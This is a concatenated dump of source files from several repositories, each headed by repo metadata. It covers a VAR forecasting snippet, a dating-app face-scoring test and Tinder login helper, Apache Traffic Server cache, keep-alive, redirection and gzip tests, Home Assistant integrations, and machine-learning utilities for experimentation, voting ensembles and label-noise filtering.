#dataset.columns = ['sum_tot_inj', 'days_inj', 'sum_inj_rate', 'sum_inj_pres', 'sum_max_pres', 'oil_prod', 'gas_prod', 'water_prod', 'water_cut', 'cum_water_inj', 'cum_oil_prod', 'cum_gas_prod', 'cum_water_prod', 'thick', 'phi', 'k', 'compr', 'Swi', 'oil_dens', 'pres_aband', 'viscos_bp', 'fvf', 'press_init']
#values = data.values
## integer encode direction
#encoder = LabelEncoder()
#values[:,3] = encoder.fit_transform(values[:,3])
## ensure all data is float
#values = values.astype('float32')
## normalize features
#scaler = MinMaxScaler(feature_range=(0, 1))
#scaled = scaler.fit_transform(values)
## frame as supervised learning
#reframed = series_to_supervised(scaled, 1, 1)
#
#mdata = sm.datasets.macrodata.load_pandas().data
model = VAR(data)
results = model.fit()
print(results.summary())
#results.plot()
model.select_order(20)
results = model.fit(maxlags=20, ic='aic')
lag_order = results.k_ar
results.forecast(data.values[-lag_order:],6)
results.plot_forecast(10)
#
#irf = results.irf(10)
#irf.plot(orth=False)
#
#irf.plot(impulse='cum_oil_prod')
``` |
{
"source": "Jpe230/DDatingApp",
"score": 2
} |
#### File: DDatingApp/neuralnetwork/test.py
```python
import tensorflow as tf
import pickle
import numpy as np
import cv2
import os
from keras.applications import resnet50
from keras.models import Sequential
from keras.applications.resnet50 import ResNet50
from keras.layers import Dense
from keras.optimizers import Adam
from keras.layers import Dropout
# User-defined const
import const
# Needs to be here if using NVIDIA GPU, otherwise model wouldnt load
physical_devices = tf.config.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True)
# Load ResNet50 as our base
resnet = ResNet50(include_top=False, pooling='avg')
model = Sequential()
model.add(resnet)
model.add(Dense(5, activation='softmax'))
model.layers[0].trainable = False
# Load our trained weights
model.load_weights(const.TRAINEDMODEL_FILE)
image_data = []
attract_data = []
PC = []
score = []
predScore = []
def detectFace(detector, image_path, image_name):
imgAbsPath = image_path + image_name
img = cv2.imread(imgAbsPath)
if img.ndim == 3:
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
else:
gray = img
w = img.shape[1]
faces = detector.detectMultiScale(gray, 1.1, 5, 0, (w//2, w//2))
resized_im = 0
if len(faces) == 1:
face = faces[0]
croped_im = img[face[1]:face[1]+face[3], face[0]:face[0]+face[2], :]
resized_im = cv2.resize(croped_im, (224, 224))
else:
print(image_name+" error " + str(len(faces)))
return resized_im
# Load CV2 face detector
face_cascade = cv2.CascadeClassifier(const.MODEL_PATH)
# Load test data
test_data = pickle.load(open(const.TESTING_FILE, 'rb'))
data_len = test_data.__len__()
test_label_dist = train_Y = [
x for x in test_data[0:data_len]]
# Test the data
for i in range(0, data_len):
label_distribution = test_label_dist[i]
image = label_distribution[1]
print("dist:" + str(label_distribution[0]))
label_score = 1*label_distribution[2][0] + 2*label_distribution[2][1] + 3 * \
label_distribution[2][2] + 4 * \
label_distribution[2][3] + 5*label_distribution[2][4]
print("score:%1.2f " % (label_score))
score.append(label_score)
# Predict with our model
pred = model.predict(np.expand_dims(image, axis=0))
ldList = pred[0]
pred = 1 * ldList[0] + 2 * ldList[1] + 3 * \
ldList[2] + 4 * ldList[3] + 5 * ldList[4]
print("prediction:" + str(pred))
predScore.append(pred)
# Get Correletion
y = np.asarray(score)
pred_y = np.asarray(predScore)
corr = np.corrcoef(y, pred_y)[0, 1]
# 1 = PERFECT
# 0.50 - .99 = High
# 0.30 - .49 = Moderate
# 0.00 - .29 = Low
# 0 = No correlation
# Tested correlation was around .0.46
print('PC (Pearson correlation) mean = %1.2f ' % (corr))
```
#### File: tinder/login/tinderlogin.py
```python
from time import sleep
from tinder.login.smslogin import SMSLogin
from selenium.common.exceptions import NoSuchElementException
class TinderLogin:
def __init__(self, driver):
self.driver = driver
self.type = type
self.__isLogged = False
self.methodLogin = SMSLogin(driver)
def logIn(self):
driver = self.driver
self.methodLogin.logIn()
if self.check_exists_by_xpath_element('/html/body/div[1]/div/div[1]/div/aside/div/a/h2'):
sleep(1)
self.handle_popup()
self.__isLogged = True
else:
self.__isLogged = False
def handle_popup(self):
driver = self.driver
# You received a like
if self.check_exists_by_xpath_element('/html/body/div[2]/div/div/div/div[3]/button[2]'):
button = driver.find_element_by_xpath('/html/body/div[2]/div/div/div/div[3]/button[2]')
button.click()
def isLogged(self):
return self.__isLogged
def check_exists_by_xpath_element(self, xpath):
driver = self.driver
sleep(2)
try:
element = driver.find_element_by_xpath(xpath)
except NoSuchElementException:
return False
return True
``` |
{
"source": "jpeach/trafficserver",
"score": 2
} |
#### File: tsqa/tests/test_cache_generation.py
```python
import os
import subprocess
import logging
import requests
import random
import uuid
import time
import helpers
import tsqa.test_cases
import tsqa.utils
log = logging.getLogger(__name__)
class TestCacheGeneration(helpers.EnvironmentCase):
'''
Test the cache object generation ID.
'''
def _fetch(self, path):
url = 'http://127.0.0.1:{}/{}'.format(
self.configs['records.config']['CONFIG']['proxy.config.http.server_ports'],
path
)
log.debug('get {}'.format(url))
return requests.get(url, headers={'x-debug': 'x-cache,x-cache-key,via,x-cache-generation'})
def _dump(self, response):
log.info('HTTP response {}'.format(response.status_code))
for k, v in response.headers.items():
log.info(' {}: {}'.format(k, v))
def _ctl(self, *args):
cmd = [os.path.join(self.environment.layout.bindir, 'traffic_ctl')] + list(args)
out, _ = tsqa.utils.run_sync_command(
cmd,
env=self.environment.shell_env, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
return out
@classmethod
def setUpEnv(cls, env):
cls.configs['plugin.config'].add_line('xdebug.so')
cls.configs['remap.config'].add_line(
'map /default/ http://127.0.0.1/ @plugin=generator.so'
)
cls.configs['remap.config'].add_line(
'map /generation1/ http://127.0.0.1/' +
' @plugin=conf_remap.so @pparam=proxy.config.http.cache.generation=1' +
' @plugin=generator.so'
)
cls.configs['remap.config'].add_line(
'map /generation2/ http://127.0.0.1/' +
' @plugin=conf_remap.so @pparam=proxy.config.http.cache.generation=2' +
' @plugin=generator.so'
)
# Start with cache generation turned off
cls.configs['records.config']['CONFIG']['proxy.config.http.cache.generation'] = -1
# Wait for the cache so we don't race client requests against it.
cls.configs['records.config']['CONFIG']['proxy.config.http.wait_for_cache'] = 1
cls.configs['records.config']['CONFIG']['proxy.config.config_update_interval_ms'] = 1
def test_generations_are_disjoint(self):
"""Test that the same URL path in different cache generations creates disjoint objects"""
objectid = uuid.uuid4()
# First touch is a MISS.
ret = self._fetch('default/cache/10/{}'.format(objectid))
self.assertEqual(ret.status_code, 200)
self.assertEqual(ret.headers['x-cache'], 'miss', msg=ret)
self.assertEqual(ret.headers['x-cache-generation'], '-1')
# Same URL in generation 1 is a MISS.
ret = self._fetch('generation1/cache/10/{}'.format(objectid))
self.assertEqual(ret.status_code, 200)
self.assertEqual(ret.headers['x-cache'], 'miss')
self.assertEqual(ret.headers['x-cache-generation'], '1')
# Same URL in generation 2 is still a MISS.
ret = self._fetch('generation2/cache/10/{}'.format(objectid))
self.assertEqual(ret.status_code, 200)
self.assertEqual(ret.headers['x-cache'], 'miss')
self.assertEqual(ret.headers['x-cache-generation'], '2')
# Second touch is a HIT.
ret = self._fetch('default/cache/10/{}'.format(objectid))
self.assertEqual(ret.status_code, 200)
self.assertEqual(ret.headers['x-cache'], 'hit-fresh', msg=ret.headers['x-cache'])
self.assertEqual(ret.headers['x-cache-generation'], '-1')
def test_online_cache_clear(self):
"""Test that incrementing the cache generation acts like a cache clear"""
objectid = uuid.uuid4()
# First touch is a MISS.
ret = self._fetch('default/cache/10/{}'.format(objectid))
self.assertEqual(ret.status_code, 200)
self.assertEqual(ret.headers['x-cache'], 'miss')
# Second touch is a HIT.
ret = self._fetch('default/cache/10/{}'.format(objectid))
self.assertEqual(ret.status_code, 200)
self.assertEqual(ret.headers['x-cache'], 'hit-fresh')
# Now update the generation number.
timeout = float(self._ctl('config', 'get', 'proxy.config.config_update_interval_ms').split(' ')[-1])
generation = random.randrange(65000)
gencount = 0
self._ctl('config', 'set', 'proxy.config.http.cache.generation', str(generation))
self._ctl('config', 'reload')
for _ in xrange(5):
if gencount == 0:
log.debug('waiting {} secs for the config to update'.format(timeout / 1000))
time.sleep(timeout / 1000)
ret = self._fetch('default/cache/10/{}'.format(objectid))
self.assertEqual(ret.status_code, 200)
if ret.headers['x-cache-generation'] == str(generation):
if gencount == 0:
# First time we see the new generation, it should be a miss.
self.assertEqual(ret.headers['x-cache'], 'miss')
else:
# Now the previous hits should become misses.
self.assertEqual(ret.headers['x-cache'], 'hit-fresh')
else:
# Config has not updated, so it should be a hit.
self.assertEqual(ret.headers['x-cache'], 'hit-fresh')
self.assertEqual(ret.headers['x-cache-generation'], '-1')
gencount = gencount + 1
self.assertNotEqual(gencount, 0, msg='proxy.config.http.cache.generation never updated')
```
#### File: tsqa/tests/test_origin_min_keep_alive_connection.py
```python
import time
import logging
import uuid
import socket
import requests
import tsqa.test_cases
import helpers
import SocketServer
log = logging.getLogger(__name__)
class KAHandler(SocketServer.BaseRequestHandler):
"""
A subclass of RequestHandler which return chunked encoding optionally
/parts/sleep_time/close
parts: number of parts to send
sleep_time: time between parts
close: bool whether to close properly
"""
def handle(self):
# Receive the data in small chunks and retransmit it
conn_id = uuid.uuid4().hex
start = time.time()
while True:
data = self.request.recv(4096).strip()
if data:
log.info('Sending data back to the client: {uid}'.format(uid=conn_id))
else:
log.info('Client disconnected: {timeout}seconds'.format(timeout=time.time() - start))
break
body = conn_id
time.sleep(1)
resp = ('HTTP/1.1 200 OK\r\n'
'Content-Length: {content_length}\r\n'
'Content-Type: text/html; charset=UTF-8\r\n'
'Connection: keep-alive\r\n'
'\r\n'
'{body}'.format(content_length=len(body), body=body))
self.request.sendall(resp)
class TestKeepAlive_Origin_Min_connections(helpers.EnvironmentCase):
@classmethod
def setUpEnv(cls, env):
cls.traffic_server_host = '127.0.0.1'
cls.traffic_server_port = int(cls.configs['records.config']['CONFIG']['proxy.config.http.server_ports'])
cls.socket_server_port = int(tsqa.utils.bind_unused_port()[1])
log.info("socket_server_port = %d" % (cls.socket_server_port))
cls.server = tsqa.endpoint.SocketServerDaemon(KAHandler, port=cls.socket_server_port)
cls.server.start()
cls.server.ready.wait()
cls.configs['remap.config'].add_line('map / http://127.0.0.1:{0}'.format(cls.socket_server_port))
cls.origin_keep_alive_timeout = 1
cls.configs['records.config']['CONFIG'].update({
'proxy.config.http.origin_min_keep_alive_connections': 1,
'proxy.config.http.keep_alive_enabled_out': 1,
'proxy.config.http.keep_alive_no_activity_timeout_out': cls.origin_keep_alive_timeout,
'proxy.config.exec_thread.limit': 1,
'proxy.config.exec_thread.autoconfig': 0,
})
def test_origin_min_connection(self):
response_uuids = []
# make the request N times, ensure that they are on the same connection
for _ in xrange(0, 3):
ret = requests.get('http://{0}:{1}/'.format(self.traffic_server_host, self.traffic_server_port))
response_uuids.append(ret.text)
self.assertEqual(1, len(set(response_uuids)))
# sleep for a time greater than the keepalive timeout and ensure its the same connection
time.sleep(self.origin_keep_alive_timeout * 2)
ret = requests.get('http://{0}:{1}/'.format(self.traffic_server_host, self.traffic_server_port))
self.assertEqual(ret.text, response_uuids[0])
```
#### File: tsqa/tests/test_redirection.py
```python
import requests
import helpers
import tsqa.test_cases
import tsqa.utils
import tsqa.endpoint
class TestRedirection(helpers.EnvironmentCase, tsqa.test_cases.HTTPBinCase):
@classmethod
def setUpEnv(cls, env):
cls.configs['records.config']['CONFIG'].update({
'proxy.config.http.redirection_enabled': 1,
'proxy.config.http.number_of_redirections': 10
})
cls.configs['remap.config'].add_line('map / http://127.0.0.1:{0}'.format(cls.http_endpoint.address[1]))
def test_redirection(self):
server_ports = self.configs['records.config']['CONFIG']['proxy.config.http.server_ports']
# By default Requests will perform location redirection
# Disable redirection handling with the allow_redirects parameter
r = requests.get('http://127.0.0.1:{0}/redirect/9'.format(server_ports), allow_redirects=False)
self.assertEqual(r.status_code, 200)
r = requests.get('http://127.0.0.1:{0}/redirect/10'.format(server_ports), allow_redirects=False)
self.assertEqual(r.status_code, 302)
```
#### File: gzip/tests/test_gzip.py
```python
import requests
import logging
import random, string
import tsqa.test_cases
import tsqa.utils
import tsqa.endpoint
import os
origin_content_length = 0
log = logging.getLogger(__name__)
#Test positive cases of remap gzip plugin
gzip_remap_bench = [
# Test gzip
{ "args": "@pparam=gzip1.config",
"files": [("gzip1.config", "enabled true\nremove-accept-encoding true\ncache false\ncompressible-content-type text/*\n")
],
},
{ "args": "@pparam=gzip2.config",
"files": [("gzip2.config", "enabled true\nremove-accept-encoding false\ncache false\ncompressible-content-type text/*\n")
],
},
{ "args": "@pparam=gzip3.config",
"files": [("gzip3.config", "enabled true\nremove-accept-encoding true\ncache true\ncompressible-content-type text/*\n")
],
},
{ "args": "@pparam=gzip4.config",
"files": [("gzip4.config", "enabled true\nremove-accept-encoding true\ncache true\ncompressible-content-type text/*\nflush true\n")
],
},
{ "args": "@pparam=gzip5.config",
"files": [("gzip5.config", "enabled true\nremove-accept-encoding true\ncache true\ncompressible-content-type text/*\nflush false\n")
],
},
]
#Test negative cases of remap gzip plugin
gzip_remap_negative_bench = [
#Test when gzip is disabled
{ "args": "@pparam=gzip_negative1.config",
"files": [("gzip_negative1.config", "enabled false\nremove-accept-encoding true\ncache false\ncompressible-content-type text/*\n")
],
},
#Test when compressible content doesn't match
{ "args": "@pparam=gzip_negative2.config",
"files": [("gzip_negative2.config", "enabled true\nremove-accept-encoding true\ncache false\ncompressible-content-type !text/*\n")
],
},
#Test when disallow is configured to match some pattern
{ "args": "@pparam=gzip_negative3.config",
"files": [("gzip_negative3.config", "enabled true\nremove-accept-encoding true\ncache false\ncompressible-content-type text/*\ndisallow *test*\n")
],
},
]
#Test global gzip plugin
gzip_global_bench = [
{ "args": "gzip_global1.config",
"files": [("gzip_global1.config", "enabled true\nremove-accept-encoding true\ncache true\ncompressible-content-type text/*\n")
],
},
]
#Set up an origin server which returns random string.
def handler(request):
global origin_content_length
rand_string = ''.join(random.choice(string.lowercase) for i in range(500))
origin_content_length = len(rand_string)
return rand_string
def create_config_files(env, test):
# Create gzip config files.
for file in test['files']:
filename = file[0]
content = file[1]
path = os.path.join(env.layout.prefix, 'etc/trafficserver', filename);
with open(path, 'w') as fh:
fh.write(content)
class StaticEnvironmentCase(tsqa.test_cases.EnvironmentCase):
@classmethod
def getEnv(cls):
#layout = tsqa.environment.Layout('/opt/gitlab-gzip')
layout = tsqa.environment.Layout('/opt/apache/trafficserver.TS-4147')
env = tsqa.environment.Environment()
env.clone(layout=layout)
return env
#Test gzip remap plugin
class TestGzipRemapPlugin(tsqa.test_cases.DynamicHTTPEndpointCase, StaticEnvironmentCase):
@classmethod
def setUpEnv(cls, env):
cls.configs['plugin.config'].add_line('xdebug.so')
cls.configs['records.config']['CONFIG'].update({
'proxy.config.diags.debug.enabled': 1,
'proxy.config.diags.debug.tags': '.*',
'proxy.config.diags.debug.tags': 'gzip.*',
'proxy.config.url_remap.pristine_host_hdr': 1,})
cls.http_endpoint.add_handler('/path/to/object', handler)
def add_remap_rule(remap_prefix, remap_index, test):
host = 'test_{0}_{1}.example.com'.format(remap_prefix, remap_index)
port = cls.configs['records.config']['CONFIG']['proxy.config.http.server_ports']
args = test['args']
remap_rule = 'map http://{0}:{1} http://127.0.0.1:{2} @plugin=gzip.so {3}'.format(host, port, cls.http_endpoint.address[1], args)
log.info(' {0}'.format(remap_rule))
cls.configs['remap.config'].add_line(remap_rule)
# Prepare gzip tests related remap rules.
i = 0
for test in gzip_remap_bench:
add_remap_rule("gzip", i, test)
create_config_files(env, test)
i+=1
#Prepare negative gzip tests related remap rules.
i = 0
for test in gzip_remap_negative_bench:
add_remap_rule("gzip_negative", i, test)
create_config_files(env, test)
i+=1
def send_request(self,remap_prefix, remap_index):
host = 'test_{0}_{1}.example.com'.format( remap_prefix, remap_index)
port = self.configs['records.config']['CONFIG']['proxy.config.http.server_ports']
url = 'http://127.0.0.1:{0}/path/to/object'.format(port)
log.info('host is {0}, port is {1}, url is {2}'.format(host, port, url))
s = requests.Session()
s.headers.update({'Host': '{0}:{1}'.format(host, port)})
s.headers.update({'Accept-Encoding:': 'gzip'})
response = s.get(url)
log.info('Response headers obtained: {0}'.format(response.headers))
return response
def send_gzip_request(self, remap_prefix, remap_index):
'''
Sends a gzip request to the traffic server
'''
response = self.send_request(remap_prefix, remap_index)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.headers['Content-Encoding'], 'gzip')
self.assertLess(int(response.headers['Content-Length']), int(origin_content_length))
def send_gzip_request_negative(self, remap_prefix, remap_index):
'''
Sends a gzip request to the traffic server
'''
response = self.send_request(remap_prefix, remap_index)
self.assertEqual(response.status_code, 200)
self.assertEqual(int(response.headers['Content-Length']), int(origin_content_length))
def test_gzip_remap_plugin(self):
i = 0
for test in gzip_remap_bench:
self.send_gzip_request('gzip', i)
i += 1
i = 0
for test in gzip_remap_negative_bench:
self.send_gzip_request_negative('gzip_negative', i)
i += 1
#Test gzip global plugin
class TestGzipGlobalPlugin(tsqa.test_cases.DynamicHTTPEndpointCase, StaticEnvironmentCase):
@classmethod
def setUpEnv(cls, env):
cls.configs['plugin.config'].add_line('xdebug.so')
cls.configs['records.config']['CONFIG'].update({
'proxy.config.diags.debug.enabled': 1,
'proxy.config.diags.debug.tags': 'gzip.*',
'proxy.config.url_remap.pristine_host_hdr': 1,})
cls.http_endpoint.add_handler('/path/to/object', handler)
def add_remap_rule(remap_prefix, remap_index):
host = 'test_{0}_{1}.example.com'.format(remap_prefix, remap_index)
port = cls.configs['records.config']['CONFIG']['proxy.config.http.server_ports']
remap_rule = 'map http://{0}:{1} http://127.0.0.1:{2}'.format(host, port, cls.http_endpoint.address[1])
log.info(' {0}'.format(remap_rule))
cls.configs['remap.config'].add_line(remap_rule)
def add_global_plugin_rule(test):
args = test['args']
plugin_rule = 'gzip.so {0}'.format(args)
log.info(' {0}'.format(plugin_rule))
cls.configs['plugin.config'].add_line(plugin_rule)
# Prepare gzip plugin rules
i = 0
for test in gzip_global_bench:
add_remap_rule("gzip_global",i)
add_global_plugin_rule(test)
create_config_files(env, test)
i+=1
def send_request(self,remap_prefix, remap_index):
host = 'test_{0}_{1}.example.com'.format( remap_prefix, remap_index)
port = self.configs['records.config']['CONFIG']['proxy.config.http.server_ports']
url = 'http://127.0.0.1:{0}/path/to/object'.format(port)
log.info('host is {0}, port is {1}, url is {2}'.format(host, port, url))
s = requests.Session()
s.headers.update({'Host': '{0}:{1}'.format(host, port)})
s.headers.update({'Accept-Encoding:': 'gzip'})
response = s.get(url)
log.info('Response headers obtained: {0}'.format(response.headers))
return response
def send_global_gzip_request(self, remap_prefix, remap_index):
'''
Sends a gzip request to the traffic server
'''
response = self.send_request(remap_prefix, remap_index)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.headers['Content-Encoding'], 'gzip')
self.assertLess(int(response.headers['Content-Length']), int(origin_content_length))
def test_gzip_global_plugin(self):
i = 0
for test in gzip_global_bench:
self.send_global_gzip_request("gzip_global", i)
i += 1
``` |
{
"source": "jpearce73/core",
"score": 2
} |
#### File: components/airvisual/diagnostics.py
```python
from __future__ import annotations
from types import MappingProxyType
from typing import Any
from homeassistant.components.diagnostics import REDACTED
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY, CONF_LATITUDE, CONF_LONGITUDE, CONF_STATE
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from .const import CONF_CITY, CONF_COUNTRY, DOMAIN
CONF_COORDINATES = "coordinates"
@callback
def _async_redact_data(data: MappingProxyType | dict) -> dict[str, Any]:
"""Redact sensitive data in a dict."""
redacted = {**data}
for key, value in redacted.items():
if key in (
CONF_API_KEY,
CONF_CITY,
CONF_COORDINATES,
CONF_COUNTRY,
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_STATE,
):
redacted[key] = REDACTED
elif isinstance(value, dict):
redacted[key] = _async_redact_data(value)
return redacted
async def async_get_config_entry_diagnostics(
hass: HomeAssistant, entry: ConfigEntry
) -> dict[str, Any]:
"""Return diagnostics for a config entry."""
coordinator: DataUpdateCoordinator = hass.data[DOMAIN][entry.entry_id]
return {
"entry": {
"title": entry.title,
"data": _async_redact_data(entry.data),
"options": _async_redact_data(entry.options),
},
"data": _async_redact_data(coordinator.data["data"]),
}
```
#### File: components/devolo_home_control/siren.py
```python
from typing import Any
from devolo_home_control_api.devices.zwave import Zwave
from devolo_home_control_api.homecontrol import HomeControl
from homeassistant.components.siren import (
ATTR_TONE,
SUPPORT_TONES,
SUPPORT_TURN_OFF,
SUPPORT_TURN_ON,
SirenEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import DOMAIN
from .devolo_multi_level_switch import DevoloMultiLevelSwitchDeviceEntity
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Get all binary sensor and multi level sensor devices and setup them via config entry."""
entities = []
for gateway in hass.data[DOMAIN][entry.entry_id]["gateways"]:
for device in gateway.multi_level_switch_devices:
for multi_level_switch in device.multi_level_switch_property:
if multi_level_switch.startswith("devolo.SirenMultiLevelSwitch"):
entities.append(
DevoloSirenDeviceEntity(
homecontrol=gateway,
device_instance=device,
element_uid=multi_level_switch,
)
)
async_add_entities(entities, False)
class DevoloSirenDeviceEntity(DevoloMultiLevelSwitchDeviceEntity, SirenEntity):
"""Representation of a cover device within devolo Home Control."""
def __init__(
self, homecontrol: HomeControl, device_instance: Zwave, element_uid: str
) -> None:
"""Initialize a devolo multi level switch."""
super().__init__(
homecontrol=homecontrol,
device_instance=device_instance,
element_uid=element_uid,
)
self._attr_available_tones = [
*range(
self._multi_level_switch_property.min,
self._multi_level_switch_property.max + 1,
)
]
self._attr_supported_features = (
SUPPORT_TURN_OFF | SUPPORT_TURN_ON | SUPPORT_TONES
)
self._default_tone = device_instance.settings_property["tone"].tone
@property
def is_on(self) -> bool:
"""Whether the device is on or off."""
return self._value != 0
def turn_on(self, **kwargs: Any) -> None:
"""Turn the device off."""
tone = kwargs.get(ATTR_TONE) or self._default_tone
self._multi_level_switch_property.set(tone)
def turn_off(self, **kwargs: Any) -> None:
"""Turn the device off."""
self._multi_level_switch_property.set(0)
def _generic_message(self, message: tuple) -> None:
"""Handle generic messages."""
if message[0].startswith("mss"):
# The default tone was changed
self._default_tone = message[1]
else:
super()._generic_message(message=message)
``` |
{
"source": "jpedrocm/DSChallenge",
"score": 3
} |
#### File: jpedrocm/DSChallenge/ExperimentationModule.py
```python
import numpy as np
from sklearn.model_selection import cross_val_score
class Experimentation:
"""This class holds a ML model and allows training, predicting and
evaluation with it.
"""
def __init__(self, model, n_folds):
"""Constructor, holds the ML model."""
self.model = model
self.n_folds = n_folds
def _cross_validation_score(self, X, y, scoring):
"""Makes cross_validation and evaluate each fold score."""
scores = cross_val_score(self.model, X, y = y, cv = self.n_folds,
scoring = scoring, verbose=2, n_jobs=1)
return scores
def experiment_model(self, X, y, scoring):
"""Returns the results of the cross-validation."""
folds_scores = self._cross_validation_score(X, y, scoring)
mean_score = np.mean(folds_scores)
std_score = np.std(folds_scores)
return folds_scores, mean_score, std_score
def get_model(self):
"""Returns the ML model."""
return self.model
def predict_labels(self, X):
"""Returns the predicted labels for each row in X."""
return self.model.predict(X)
def predict_probs(self, X):
"""Returns the predicted probabilites for each row in X."""
return self.model.predict_proba(X)
def train_model(self, X, y):
"""Trains model with the list of features X, and the list
of labels y.
"""
self.model.fit(X, y)
```
#### File: jpedrocm/DSChallenge/HandlerModule.py
```python
import pandas as pd
class Handler:
"""This class handles missing data in the dataframe and removes
unninformative columns from it.
"""
@classmethod
def _identify_imputation_method(cls, method):
"""Returns the appropriate imputation function."""
if method=='mean':
return cls._impute_mean_value
elif method=='mode':
return cls._impute_mode_value
elif method=='median':
return cls._impute_median_value
else:
return cls._impute_previous_value
@staticmethod
def _impute_mean_value(column):
"""Fill missing data with the mean of the column."""
mean_val = column.mean()
column.fillna(value=mean_val, inplace=True)
@staticmethod
def _impute_median_value(column):
"""Fill missing data with the median of the column."""
median_val = column.median()
column.fillna(value=median_val, inplace=True)
@staticmethod
def _impute_mode_value(column):
"""Fill missing data with the mode of the column."""
mode_val = column.mode()[0]
column.fillna(value=mode_val, inplace=True)
@staticmethod
def _impute_previous_value(column):
"""Fill missing data with previous values present in the column."""
column.fillna(method='pad', inplace=True)
@classmethod
def impute_missing_values(cls, dataframe, headers, method = None):
"""Impute data for the missing values in the specified columns with
the given method.
"""
_impute_function = cls._identify_imputation_method(method)
for header in headers:
column = dataframe[header]
_impute_function(column)
@staticmethod
def remove_columns(dataframe, headers):
"""Removes unwanted columns in place based on the given list of
headers.
"""
dataframe.drop(headers, inplace=True, axis=1)
@staticmethod
def remove_rows(dataframe, headers, how):
"""Removes rows which has invalid values for all/any columns from the
given header list.
"""
dataframe.dropna(how=how, subset=headers, inplace=True)
``` |
{
"source": "jpedrocm/jpcm-lista1-codigo",
"score": 3
} |
#### File: jpcm-lista1-codigo/code/prefit_voting_classifier.py
```python
import numpy as np
from sklearn.utils.validation import check_is_fitted
class PrefitVotingClassifier(object):
"""Stripped-down version of VotingClassifier that uses prefit estimators"""
def __init__(self, estimators, feats_per_estimator, voting='hard', weights=None):
self.estimators = [e[1] for e in estimators]
self.feats_per_estimator = feats_per_estimator
self.named_estimators = dict(estimators)
self.voting = voting
self.weights = weights
def fit(self, X, y, sample_weight=None):
raise NotImplementedError
def predict(self, X):
""" Predict class labels for X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
Returns
----------
maj : array-like, shape = [n_samples]
Predicted class labels.
"""
check_is_fitted(self, 'estimators')
if self.voting == 'soft':
maj = np.argmax(self.predict_proba(X), axis=1)
else: # 'hard' voting
predictions = self._predict(X)
maj = np.apply_along_axis(lambda x:
np.argmax(np.bincount(x,
weights=self.weights)),
axis=1,
arr=predictions.astype('int'))
return maj
def _collect_probas(self, X):
"""Collect results from clf.predict calls. """
return np.asarray([clf.predict_proba(X) for clf in self.estimators])
def _predict_proba(self, X):
"""Predict class probabilities for X in 'soft' voting """
if self.voting == 'hard':
raise AttributeError("predict_proba is not available when"
" voting=%r" % self.voting)
check_is_fitted(self, 'estimators')
avg = np.average(self._collect_probas(X), axis=0, weights=self.weights)
return avg
@property
def predict_proba(self):
"""Compute probabilities of possible outcomes for samples in X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
Returns
----------
avg : array-like, shape = [n_samples, n_classes]
Weighted average probability for each class per sample.
"""
return self._predict_proba
def transform(self, X):
"""Return class labels or probabilities for X for each estimator.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
Returns
-------
If `voting='soft'`:
array-like = [n_classifiers, n_samples, n_classes]
Class probabilities calculated by each classifier.
If `voting='hard'`:
array-like = [n_samples, n_classifiers]
Class labels predicted by each classifier.
"""
check_is_fitted(self, 'estimators')
if self.voting == 'soft':
return self._collect_probas(X)
else:
return self._predict(X)
def _predict(self, X):
"""Collect results from clf.predict calls. """
return np.asarray([self.estimators[i].predict(self._select_features(X, i)) for i in xrange(len(self.estimators))]).T
def _select_features(self, X, estimator_index):
X_selected = X[:, self.feats_per_estimator[estimator_index]]
return X_selected
``` |
{
"source": "jpedrocm/noise-detection-ensemble",
"score": 2
} |
#### File: noise-detection-ensemble/src/config_helper.py
```python
from numpy import nan
from sklearn.ensemble import RandomForestClassifier as RF
from sklearn.ensemble import AdaBoostClassifier as Adaboost
from sklearn.tree import DecisionTreeClassifier as Tree
from data_helper import DataHelper
from metrics_helper import MetricsHelper
from noise_detection_ensemble import NoiseDetectionEnsemble
from majority_filtering import MajorityFiltering
class ConfigHelper():
nb_executions = 50
noise_levels = [0.0, 0.1, 0.2, 0.3, 0.4]
@staticmethod
def get_datasets():
space = " "
comma = ","
return ["blood",
"breast",
"chess",
"heart",
"ionosphere",
"liver",
"parkinsons",
"sonar",
"spambase",
]
@staticmethod
def get_classifiers():
return [
("FL_RF", Tree(max_depth=None, min_samples_leaf=1,
splitter="random"), "fl"),
("CL_RF", Tree(max_depth=None, min_samples_leaf=1, splitter="random"), "cl"),
("FL_MAJ_RF", MajorityFiltering.get_ensemble(), "maj"),
("RF", RF(n_estimators=501, max_depth=None,
max_features="sqrt", min_samples_leaf=1,
n_jobs=-1), None),
("Boosting", Adaboost(base_estimator=Tree(max_depth=None,
min_samples_leaf=1,
min_samples_split=2,
min_impurity_decrease=0.01),
n_estimators=501, algorithm="SAMME"),
None)
]
@staticmethod
def choose_algorithm(clf, clean_type, train_X, noisy_train_y,
noisy_idxs, max_nb_feats):
chosen_rate = nan
chosen_threshold = nan
chosen_X = None
chosen_y = None
chosen_clf = None
true_filtered = 0
if clean_type == None:
chosen_X = train_X
chosen_y = noisy_train_y
chosen_clf = clf
elif clean_type == "maj":
filt_X, filt_y = MajorityFiltering.run(train_X,
noisy_train_y)
chosen_X = filt_X
chosen_y = filt_y
chosen_clf = MajorityFiltering.get_ensemble()
true_filtered = MetricsHelper.calculate_true_filter(chosen_y.index,
noisy_idxs)
else:
algorithm_data = NoiseDetectionEnsemble.run(clf, clean_type,
train_X,
noisy_train_y,
max_nb_feats)
chosen_rate = algorithm_data[0]
chosen_threshold = algorithm_data[1]
chosen_X = algorithm_data[2]
chosen_y = algorithm_data[3]
chosen_X, chosen_y, adapted_rate = DataHelper.adapt_rate(chosen_X,
chosen_y, chosen_rate)
